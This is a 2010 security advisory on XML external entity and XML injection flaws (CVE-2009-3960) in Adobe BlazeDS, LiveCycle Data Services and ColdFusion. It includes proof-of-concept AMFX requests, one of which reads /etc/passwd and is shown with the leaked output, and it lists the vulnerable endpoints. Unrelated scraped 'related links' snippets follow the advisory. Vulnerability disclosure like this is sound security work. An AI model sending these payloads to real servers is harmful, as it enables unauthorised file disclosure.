( , ) (,
. `.' ) ('. ',
). , ('. ( ) (
(_,) .`), ) _ _,
/ _____/ / _ / ____ ____ _____
/____ /==/ /_/ / _/ ___// _ / / /
/ // | // /__( <_> ) Y Y /
/______ //___|__ / /___ >____/|__|_| /
// //.-. // //:wq
(x.0)
'=.|w|.='
_='`"``=.
presents..
Multiple Adobe Products
XML External Entity And XML Injection Vulnerabilities
CVE: CVE-2009-3960
Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html
Link:
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+-----------+
|Description|
+-----------+
Security-Assessment.com discovered that multiple Adobe
products with different Data Services versions are
vulnerable to XML External Entity (XXE) and XML
injection attacks.
XML external Entities injection allows a wide range of
XML based attacks, including local file disclosure,
TCP scans and Denial of Service condition, which can
be achieved by recursive entity injection, attribute
blow up and other types of injection.
For more information about the implications associated
to this vulnerability, refer to the RFC2518 (17.7
Implications of XML External Entities):
http://www.ietf.org/rfc/rfc2518.txt
+--------------+
|Product Review|
+--------------+
Adobe Data Services components provide Flex/RIA
applications with data messaging, remoting and
management capabilities.
The discovered vulnerabilities affect the HTTPChannel
servlet classes which are respectively
“mx.messaging.channels.HTTPChannel” and
“mx.messaging.channels.SecureHTTPChannel”. These
classes are part of the Data Services Messaging
classes and can be found in the
flex-messaging-common.jar Java archive.
The HTTPChannel transports data in the AMFX format,
which is the text-based XML representation of AMF.
The HTTPChannel endpoints are defined in the
services-config.xml file, located within the
Flex/WEB-INF folder of the application.
By default, the HTTPChannel classes are mapped to
the following endpoints:
1. http://{server.name}:{server.port}/{context.root}/messagebroker/http
2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure
Note that the HTTPChannel may be mapped to different
endpoints.
This depends on the deployed application and the
framework in use (e.g. BlazeDS, Adobe LiveCycle
Data Services, etc.).
+--------------------------------------------+
|Exploitation - XML External Entity Injection|
+--------------------------------------------+
XML entities can be declared and included within AMFX
requests passed to the HTTPChannel. The XML parser
parses the payload and successfully processes
injected entities.
The following table shows an example of XML external
entity injection which leads to local file disclosure.
The AMFX request is sent via the HTTPChannel endpoint
in BlazeDS.
XML External Entity Injection – Local File Disclosure
PoC – BlazeDS – Request
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx";>
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
XML External Entity Injection – Local File Inclusion
PoC – BlazeDS – Response
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">
<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>
<body targetURI="/onResult" responseURI="">
<object type="flex.messaging.messages.AcknowledgeMessage">
<traits><string>timestamp</string><string>headers</string>
<string>body</string><string>correlationId</string>
<string>messageId</string><string>timeToLive</string>
<string>clientId</string><string>destination</string>
</traits><double>1.257387140632E12</double><object>
<traits><string>DSMessagingVersion</string>
<string>DSId</string></traits><double>1.0</double>
<string>BDE929FE-270D-3B56-1061-616E8B938429</string>
</object><null/><string>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
[...]
The above injection was successfully tested on
multiple Adobe products, as shown below:
1. Product: Adobe BlazeDS 3.2.0.39
Linux Ubuntu 9.04 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
2. Adobe LiveCycle Data Services ES2 3.0
Windows XP SP2 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
3. ColdFusion 9.0
Windows XP SP2 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/flex2gateway/http
{server.name}:{server.port}/
{context.root}/flex2gateway/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
4. Adobe LiveCycle ES2
Windows XP SP2 / IBM Websphere 7.0
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
The vendor has released several patches for this
vulnerability. See the Solution section of this
document for more information.
+----------------------------+
|Exploitation - XML Injection|
+----------------------------+
The XML parser lacks of proper input and output
validation controls. Security-Assessment.com managed
to inject arbitrary XML content which was returned
in the XML response.
The following table shows an XML injection in the
BlazeDS HTTPChannel. The injected payload becomes
part of the response. In this case, injection is
possible via the “responseURI” attribute.
XMLInjection – BlazeDS - Request
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="" responseURI="d" injectedattr="anything"><null/>
</body></amfx>
XMLInjection – BlazeDS - Response
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>
The above injection was successfully tested on
multiple Adobe products, as shown below:
1. Product: Adobe BlazeDS 3.2.0.39
Linux Ubuntu 9.04 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
2. Adobe LiveCycle Data Services ES2 3.0
Windows XP SP2 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
3. ColdFusion 9.0
Windows XP SP2 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/flex2gateway/http
{server.name}:{server.port}/
{context.root}/flex2gateway/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
4. Adobe LiveCycle ES2
Windows XP SP2 / IBM Websphere 7.0
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
The vendor has released several patches for this
vulnerability. See the Solution section of this
document for more information.
+--------+
|Solution|
+--------+
Security-Assessment.com follows responsible
disclosure and promptly contacted the vendor after
discovering the issues. The vendor was contacted on
the 6th November 2009 and a reply was received on the
same day. The vendor released security patches on
the 11th February 2010.
The security patches can be downloaded at the
following website:
http://www.adobe.com/support/security/bulletins/apsb10-05.html
+------+
|Credit|
+------+
Discovered and advised to Adobe in
November 2009 by Roberto Suggi Liverani of Security-
Assessment.com. Personal Page: http://malerisch.net/
For full details regarding this vulnerability
download the PDF from our website:
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+---------+
|Greetings|
+---------+
Bug found at Hack in The Sun 2009, Waiheke Island.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a New Zealand based world
leader in web application testing, network security
and penetration testing. Security-Assessment.com
services organisations across New Zealand, Australia,
Asia Pacific, the United States and the United
Kingdom.
Roberto Suggi Liverani
分享到:
相关推荐
v=4.1.1 type : module 或使用安装并添加以下内容(如果处于YAML模式): lovelace : resources : - url : /hacsfiles/lovelace-multiple-entity-row/multiple-entity-row.js type : module 不使用YAML模式时,可以...
介绍XXE漏洞攻防知识
Laravel开发-laravel-doctrine-entity-validation 提供条令实体和Laravel验证器之间的集成。
Laravel开发-laravel-entity-services 针对典型CRUD操作的Saritasa实体服务
Laravel开发-laravel-entity-generator 提供了用于生成实体的控制台命令。
Laravel开发-lara-ore-legal-entity 暂无描述
Laravel开发-clara-entity-generator 存储库生成一个CRUD系统(控制器、模型、存储库、使用引导的视图等等),扫描数据库的shema。
Entity Framework 6 (EF6) is a tried and tested object-relational mapper (O/RM) for .NET with many years of feature development and stabilization.
Laravel开发-doctrine-entity-factories 允许理论将实体从工厂中拉出来,而不仅仅是反思
- url : /local/toggle-lock-entity-row.js type : js views : - title : My view cards : - type : entities entities : - entity : light.my_lamp name : A lamp type : custom:toggle-lock-entity-row ...
2007-EMNLP-CoNLL-Large-scale named entity disambiguation based on Wikipedia data
Api-grape-entity.zip,位于对象模型顶部的以api为中心的外观。,一个api可以被认为是多个软件设备之间通信的指导手册。例如,api可用于web应用程序之间的数据库通信。通过提取实现并将数据放弃到对象中,api简化了...
比较全面的XML参考电子书!强列推荐。如下是目录: 第一部分 XML简介... 9 第1章 XML概览... 9 1.1 什么是XML. 10 1.1.1 XML是元标记语言... 10 1.1.2 XML描述的是结构和语义,而不是格式化... 10 1.2 为什么...
XML越来越热,关于XML的基础教程网络上也随处可见。可是一大堆的概念和术语往往让人望而生畏,很多朋友问我:XML到底有什么用,我们是否需要学习它?我想就我个人学习过程的心得和经验,写一篇比较全面的介绍文章。...
这是带有Home Assistant自定义ui卡simple-button-entity-row 。 该卡用于entities内部。 它可以显示图标,名称和带有一些文本的按钮。 按下按钮进行服务呼叫。 安装 您可以通过多种方法将此卡添加到家庭助理中。 ...
没有spring-data-jpa-entity-graph的生活 仅通过注释支持EntityGraph。 因此,对于存储库方法,必须在编译之前最多选择一个EntityGraph。 这样可以避免您在考虑运行时上下文的情况下选择最佳的EntityGraph :broken_...
基于模板的BART命名实体识别_Template-Based Named Entity Recognition Using BART.pdf
C#:此小程序实现将复杂的 json 格式数据转换为对应的实体类对象,对象与对象之间的关系采用了 ImplementFactory 组件提供的 Constraint 属性,可以在 Visual Studio 里使用 Nuget 搜索并引用该组件,该组件可实现...
可以从Bower安装d2l-fetch-siren-entity-behavior : bower install Brightspace/d2l-fetch-siren-entity-behavior 用法 将行为添加到您的组件中: < link rel = "import" href = "../../d2l-fetch-siren-...